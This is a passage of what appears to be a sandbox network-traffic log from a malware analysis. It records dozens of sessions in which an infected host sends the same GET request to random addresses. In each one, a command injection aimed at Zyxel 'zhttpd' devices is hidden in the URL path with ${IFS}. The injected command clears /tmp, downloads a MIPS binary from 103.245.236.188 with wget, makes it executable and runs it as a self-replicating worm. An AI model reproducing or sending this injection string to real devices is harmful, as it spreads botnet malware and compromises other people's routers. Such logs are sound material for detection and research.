                                                Jan 12, 2024 18:16:26.524895906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5135192.168.2.235058241.1.255.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524933100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5136192.168.2.2339706222.36.39.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524940968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5137192.168.2.2341946130.204.8.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.524979115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5138192.168.2.2334890201.30.231.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525015116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5139192.168.2.235370894.78.1.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525057077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5140192.168.2.23348444.160.36.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525083065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5141192.168.2.2339964143.67.5.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525124073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5142192.168.2.235095212.129.10.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525170088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5143192.168.2.2355328112.157.32.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525209904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5144192.168.2.2335264219.62.75.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525238037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5145192.168.2.235954846.224.123.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525290012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5146192.168.2.2348980123.202.200.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525317907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5147192.168.2.2335706163.183.206.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525347948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5148192.168.2.235008035.128.59.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525382996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5149192.168.2.2342912164.79.245.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525417089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5150192.168.2.234736261.164.165.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525477886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5151192.168.2.233428212.121.147.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525520086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5152192.168.2.234854849.38.74.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525538921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5153192.168.2.235928492.111.251.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525571108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5154192.168.2.2356686109.39.32.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525605917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5155192.168.2.233791458.196.244.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525631905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5156192.168.2.236075639.126.86.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525665998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5157192.168.2.2356728129.221.245.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525702000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5158192.168.2.235126465.219.150.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525753021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5159192.168.2.2358198149.210.66.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525789022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5160192.168.2.234764276.106.204.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525839090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5161192.168.2.2347828151.206.157.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525877953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5162192.168.2.234060057.82.67.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525912046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5163192.168.2.2336630180.251.20.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525943995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5164192.168.2.2344870163.22.21.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.525991917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5165192.168.2.23337805.219.14.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526038885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5166192.168.2.2342314154.91.4.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526084900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5167192.168.2.235320250.145.24.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526129007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5168192.168.2.2350696184.44.98.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526165009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5169192.168.2.235652237.54.170.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526185036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5170192.168.2.234690040.151.73.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526253939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5171192.168.2.2345316126.238.115.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526287079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5172192.168.2.2354980161.53.240.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526308060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5173192.168.2.2350188143.145.0.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526352882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5174192.168.2.2347452154.123.131.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526390076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5175192.168.2.2336464163.124.2.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526432991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5176192.168.2.2349848148.239.100.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526489019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5177192.168.2.2341180133.154.134.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526504993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5178192.168.2.23448929.138.164.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526561022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5179192.168.2.2336764168.46.229.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526596069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5180192.168.2.233888858.209.84.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526648998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5181192.168.2.2336382196.185.75.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526680946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5182192.168.2.2351370213.243.86.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526730061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5183192.168.2.234141498.42.185.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526788950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5184192.168.2.2334880160.58.154.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526818037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5185192.168.2.2337942201.32.192.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526854992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5186192.168.2.2352698131.186.247.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526878119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5187192.168.2.2360918179.187.154.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526923895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5188192.168.2.2346276140.13.186.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.526952028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5189192.168.2.234608463.118.214.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527015924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5190192.168.2.236006852.61.127.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527050972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5191192.168.2.235586299.109.153.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527087927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5192192.168.2.234140670.183.50.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527139902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5193192.168.2.233975418.122.174.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527173042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5194192.168.2.2357224159.191.146.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527215958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5195192.168.2.2333530221.213.13.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527255058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5196192.168.2.235030082.251.102.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527275085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5197192.168.2.235845652.86.136.151443
                                                TimestampBytes transferredDirectionData
